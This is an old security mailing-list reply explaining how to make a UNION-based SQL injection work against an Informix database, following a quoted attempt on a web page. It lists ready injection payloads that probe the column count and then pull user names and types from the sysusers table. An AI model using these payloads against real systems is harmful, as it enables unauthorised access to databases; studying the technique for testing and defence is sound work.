Re: SQL Injection with Informix

[Martin Eiszner <martin () websec org>]

On Wed, 3 Jul 2002 16:28:18 -0600 
"Whyte, Jesse" <Jesse.Whyte () us gambro com> wrote:

> http://app.default.com/default.cfm?var='UNION%20ALL%20SELECT%20username%2C%2
> 0usertype%20FROM%20sysusers
> [Informix][Informix ODBC Driver][Informix]Corresponding column types must be
> compatible for each UNION statement.

..........................


hola, 

i never did a test on informix .. but ...


The first test (queries) should be semething like:
(using "1" should satisfy all different data types for all the other fields)

check out a standard-table with many fields (or something like "dual" on oracle ..)

---*---
union select '1' from [TABLEX];--
union select '1','1' from [TABLEX];--
union select '1','1','1' from [TABLEX];--
union select '1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1','1','1' from [TABLEX];--

(and so on ...)
---*---

(using "1" should satisfy all different data types for all the other fields)

.. you know that you hit the right column-number when there is no 
more error-message .. 


username and usertype could be concated "username||usertype" (check the "concat"-syntax for informix).
so there is only one char, varchar, text(or similar) field left that you 
have to "hit directly".

now try to brute-force any proper "query-signature" of the union statement:

---*---

union select '1',(username||usertype),['1'xnumber of fields] from sysusers;-- 
union select '1','1',(username||usertype),['1'xnumber of fields -1 ] from sysusers;-- 
union select '1','1','1',(username||usertype),['1'xnumber of fields -2 ] from sysusers;-- 
union select '1','1','1','1',(username||usertype),['1'xnumber of fields -3 ] from sysusers;-- 
union select '1','1','1','1','1',(username||usertype),['1'xnumber of fields - 4] from sysusers;-- 
union select '1','1','1','1','1',(username||usertype),['1'xnumber of fields -5 ] from sysusers;-- 

(and so on ...)

---*---

check the response for differences ... thaht should do the trick ...


another possibility is "typecasting" every field withing the result-set into 1 type ("text" for example).
(check out your informix-manual for the correct syntax). 

the only thing you have to guess (brute-force) with this method, is the number of fields in the result-set.



hope that helps , nice day ,

martin


mei () websec org
http://www.websec.org







On Wed, 3 Jul 2002 16:28:18 -0600 
"Whyte, Jesse" <Jesse.Whyte () us gambro com> wrote:

> http://app.default.com/default.cfm?var='UNION%20ALL%20SELECT%20username%2C%2
> 0usertype%20FROM%20sysusers
> [Informix][Informix ODBC Driver][Informix]Corresponding column types must be
> compatible for each UNION statement.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/